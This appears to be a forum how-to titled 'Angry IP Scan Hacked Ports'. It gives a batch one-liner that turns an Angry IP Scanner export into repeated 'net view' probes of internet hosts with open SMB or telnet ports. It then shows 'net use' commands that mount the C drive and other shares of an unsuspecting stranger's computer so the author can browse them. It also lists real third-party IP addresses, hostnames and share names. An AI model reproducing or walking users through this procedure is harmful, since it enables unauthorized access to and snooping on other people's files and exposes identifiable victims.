Angry IP Scan Hacked Ports

Angry IP Stripper...

I hate cut n pasting IP's from Angry IP to my command prompt or from my Export of scanned IP's from Angry to cmd.
I looked at ways to speed up the process of doing the following command "net view \\" without the need to go back and forth from one window to another 50 times to find a small list of IP's with open shares.

I ask around on a few different Forums and someone gave me the key to make one command to stripped Agry's export and out put the IP's into CMD with the command net view \\ and do the crap work for me.

So now I can type one command or cut n paste one command to do 50 or whatever search's for open share's.

Here it is...

for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1.bat

Ok let me explain a few things.

When Angry has finished scanning a range, I export the results to a .txt file, I might name it 1.txt or 2.txt.

Inside the txt file it looks like this
-------------------------------
This file was generated by Angry IP Scanner
Visit http://www.angryziber.com/ for the latest version


Scanned 217.81.105.1 - 217.81.255.255 (Ports: 5110,139,12345,23,445)
24/03/2008 11:59:28 PM

IP Ping Hostname Comp. Name Group Name User Name MAC Address TTL Open Ports

217.81.122.148 92 ms pD9517A94.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23
217.81.128.1 994 ms pD9518001.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23
217.81.136.236 327 ms pD95188EC.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23
217.81.143.82 1806 ms pD9518F52.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23
217.81.190.34 733 ms pD951BE22.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445
217.81.209.185 651 ms N/A N/A N/A N/A N/A N/A 23
217.81.230.253 290 ms pD951E6FD.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445
217.81.235.126 417 ms pD951EB7E.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445
217.81.246.211 198 ms N/A N/A N/A N/A N/A N/A 23
217.81.248.34 387 ms pD951F822.dip.t-dialin.netCONNIPET N/A CONNIPET N/A N/A 139
217.81.250.37 331 ms pD951FA25.dip.t-dialin.netN/A N/A N/A N/A N/A 23
217.81.251.202 101 ms pD951FBCA.dip.t-dialin.netHOME-PC ARBEITSGRUPPE N/A N/A 50 139
217.81.255.60 128 ms pD951FF3C.dip.t-dialin.netN/A N/A N/A N/A N/A 139,445
-------------------------

I dont have to get Angry to save all this info, I just like looking at the different names to get a feel of what a system might have on it.

That export is saved to c:\ for example, I run cmd.exe, goto c:\, type dir and there it is.

I paste in the for command, for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1.bat


I double check its going to look in the correct txt file and also pick a name for the bat file, (auto, 1, run) it doesnt matter what the .bat is called, once I check and see the info is correct I hit enter...

Then type the name of the .bat file and its running by itself..

--------------------------
Ctrl-Break, to stop the batch file running. Hit 3 or 4 times and wait 10 seconds..

So for me it looks like this
-
C:\>for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1
.bat

C:\>1
C:\>net view \\217.81.122.148
System error 53 has occurred. <---(Most likely firewall)
The network path was not found.
C:\>net view \\217.81.128.1

-

The other thing I do is increase the command prompt height buffer so that all the information scrolling a long doesnt get lost, right click command prompt, select properties, layout, increase screen buffer size Height to 1000 or more depending on how many IPS you need to check.

Sit back and wait for it to go through the list, 50's a good number. once its done, right click the screen, mark it all, right click it again and save it in note pad and check what you have to open up..
-
net view \\89.214.144.144
Shared resources at \\89.214.144.144
Sandra
Share name Type Used as Comment
-------------------------------------------------------------
C Disk
Enviar Para o OneNote 2007 Print Enviar Para o OneNote 2007
Fact2007 Disk
HP Photosmart 7400 Series Print HP Photosmart 7400 Series
I Disk
Public Disk
Users Disk
The command completed successfully.
-

(One scan brought up this list of drives on a share.)

c:\net use k: \\89.214.144.144\C
c:\The command completed successfully.
c:\net use L: \\89.214.144.144\Fact2007
c:\The command completed successfully
c:\net use M: \\89.214.144.144\I
c:\The command completed successfully

Now in my compuer under network drives, I have 3 new shares to look at.

c on '89.214.144.144'
Fact2007 on '89.214.144.144'
I on '89.214.144.144'


Once your done browsing don't forget to right click on these and disconnect, otherwise your system will run real slow.

Also each time you run the for command and you dont change the name of your .bat file new infomation is added to it instead of it been over written.
Why this is, Im not sure, it just means the list will grow and it will take longer and longer to run a scan, so del *.bat before you run a new Stripper.

c:\edit *.bat, Select shift-Arrow Down to select a portion to delete is another option.
Edit also lets to look at what the bat looks like. The start of the bat has a little junk in it it while its running.

---
C:\>1
C:\>net view \\This
System error 53 has occurred.
The network path was not found.
C:\>net view \\Visit
System error 53 has occurred.
The network path was not found.
C:\>net view \\Scanned
System error 53 has occurred.
The network path was not found.
C:\>net view \\24/03/2008
System error 123 has occurred.
The filename, directory name, or volume label syntax is incorrect.
C:\>net view \\IP
System error 53 has occurred.
The network path was not found.
C:\>net view \\217.81.99.29
-

Edit the bat file to remove the first couple of lines ot just ignore it and let it run.

c:\for /?

Brings up all the help info on the "for" command, I never knew about it until I started asking about how to do this, I was exspecting someone to write a perl script or something, but this just goes to show theres still a lot to learn inside windows and all the little files that are with in.

I hope you guys find this useful and a real time saver and look at new ways to use the for command.

Regards RoMeO...